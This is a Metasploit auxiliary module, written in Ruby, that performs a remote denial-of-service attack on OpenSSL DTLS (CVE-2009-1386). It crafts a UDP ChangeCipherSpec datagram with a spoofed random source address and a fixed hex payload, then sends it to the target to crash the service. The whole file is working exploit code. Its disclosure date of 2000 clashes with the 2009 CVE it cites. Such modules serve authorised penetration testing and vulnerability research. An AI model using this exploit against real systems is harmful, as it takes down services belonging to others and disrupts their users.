1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Auxiliary::Dos
8
  include Msf::Exploit::Capture
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name'	=> 'OpenSSL DTLS ChangeCipherSpec Remote DoS',
15
        'Description'	=> %q{
16
          This module performs a Denial of Service Attack against Datagram TLS in OpenSSL
17
          version 0.9.8i and earlier. OpenSSL crashes under these versions when it receives a
18
          ChangeCipherspec Datagram before a ClientHello.
19
        },
20
        'Author'	=> [
21
          'Jon Oberheide <jon[at]oberheide.org>', # original code
22
          'theLightCosine' # metasploit module
23
        ],
24
        'License' => MSF_LICENSE,
25
        'References' => [
26
          [ 'CVE', '2009-1386' ],
27
          [ 'OSVDB', '55073'],
28
        ],
29
        'DisclosureDate' => '2000-04-26',
30
        'Notes' => {
31
          'Stability' => [CRASH_SERVICE_DOWN],
32
          'SideEffects' => [],
33
          'Reliability' => []
34
        }
35
      )
36
    )
37

38
    register_options([
39
      Opt::RPORT(80)
40
    ])
41

42
    deregister_options('FILTER', 'PCAPFILE', 'INTERFACE', 'SNAPLEN', 'TIMEOUT')
43
  end
44

45
  def run
46
    open_pcap
47
    print_status('Creating DTLS ChangeCipherSpec Datagram...')
48
    p = PacketFu::UDPPacket.new
49
    p.ip_daddr = datastore['RHOST']
50
    p.ip_src = rand(0x100000000)
51
    p.ip_ttl = 44
52
    p.udp_sport = 34060
53
    p.udp_dport = datastore['RPORT'].to_i
54
    p.payload = "\x14\xfe\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x01"
55
    p.recalc
56
    print_status('Sending Datagram to target...')
57
    capture_sendto(p, '255.255.255.255')
58
    close_pcap
59
  end
60
end
61

62